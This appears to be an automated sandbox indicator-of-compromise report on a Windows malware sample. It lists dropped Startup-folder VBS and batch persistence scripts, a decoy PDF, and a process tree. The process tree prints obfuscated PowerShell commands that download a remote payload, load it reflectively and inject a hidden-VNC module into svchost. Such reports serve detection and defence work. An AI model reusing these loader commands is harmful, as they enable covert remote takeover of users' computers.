IOC Report
TM3utH2CsU.exe

loading gif

Files

File Path
Type
Category
Malicious
TM3utH2CsU.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
 malicious
C:\Users\Public\Documents\pow\wm.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\Public\Documents\sys\hnvc.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\Public\Documents\sys\pure_hnvc.bat
ASCII text, with no line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat
DOS batch file, ASCII text
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat
DOS batch file, ASCII text
dropped
 malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat
DOS batch file, ASCII text
dropped
 malicious
C:\Users\Public\Documents\32.zip
Zip archive data, at least v1.0 to extract, compression method=store
dropped
C:\Users\Public\Documents\32\hnvc.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\Public\Documents\32\pure_hnvc.bat
ASCII text, with no line terminators
dropped
C:\Users\Public\Documents\pow.zip
Zip archive data, at least v1.0 to extract, compression method=store
dropped
C:\Users\Public\Documents\pow\wm_startup.bat
ASCII text, with no line terminators
dropped
C:\Users\Public\Documents\privacy_policy.pdf
PDF document, version 1.4, 21 pages
dropped
C:\Users\Public\Documents\sys.zip
Zip archive data, at least v1.0 to extract, compression method=store
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Unknown
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a03f3437-c869-4963-b39c-73632da25766.tmp
Unknown
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240925103625Z-159.bmp
PC bitmap, Windows 3.x format, 114 x -152 x 32, cbSize 69366, bits offset 54
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CasPol.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSI131a7.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mmafd3r.geb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13ghpsd0.oxy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13l01yib.may.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lswtshj.igo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1omnke05.kff.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22jhlxbo.bus.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cbfgsev.x2e.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gk12rlt.j4o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3iztureu.lt2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sd255tm.mvz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3upcrvko.dyi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41o3pwl3.fne.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_435004lx.ivc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bgmpf34.wox.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eq3vw0d.4pe.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nxfpexn.c4b.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5edoxzd4.prv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqvykjtw.gic.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axojubg2.ote.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgpk1s42.pnq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fa1mv0yc.scl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhmymu0d.jpt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxq2aurb.l3o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gucnsmjs.n5d.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx4yjvop.m1b.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hj53pggn.ent.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoi51suy.joo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ht4w4kes.y10.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvbn3hws.x0s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4xb0313.ctl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5uhqkfc.ize.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ignnvsba.dkz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jggpslft.0py.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jwsbcsvb.uzn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmifqdva.sqd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhhtzuef.vw4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0waln0l.w4o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx2t3vrt.4yf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p30xohyh.zyq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdzxutyk.bxl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgjazuau.muy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ph4uzhul.fde.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ponmtoeq.jh0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psgavopf.acp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc35t2hp.2bi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1dba01j.akx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sftw0qaa.apz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sodo4jvb.pjc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttb44ke0.gdp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tusgfaw1.uik.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5icckra.bta.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ug00ufuo.i0k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vylrls3b.b4q.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1nc4kh0.gj0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w25rhdh4.ht2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfvnc1ev.dah.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfxhpert.jcm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjgdyvnt.1mp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqk0mj54.njy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsjta0dh.ncd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyh3lfqi.uup.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3iq3ndc.lmj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xq4tz5r5.grc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yejmp1fs.3fe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yf0o4zqd.rg4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynr2jv4t.d3y.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgw0ixsm.eed.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhiffkq2.gvh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zq5xdzsk.fvr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zstexuq3.i2b.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91wuryg5_1macxqe_66c.tmp
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9l67tgh_1macxqc_66c.tmp
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-25 06-36-23-782.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\3265f9c8-163c-476b-8f0b-06cfb3aed09e.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\38843709-4979-49cf-96ff-d7102243e935.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\6503714d-8986-44a5-b034-5f48a42a5452.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\ca961033-22cb-4e5b-b9f6-2ebf3458f0f6.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
data
dropped
There are 125 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\TM3utH2CsU.exe
"C:\Users\user\Desktop\TM3utH2CsU.exe"
 malicious
C:\Windows\System32\cmd.exe
"cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
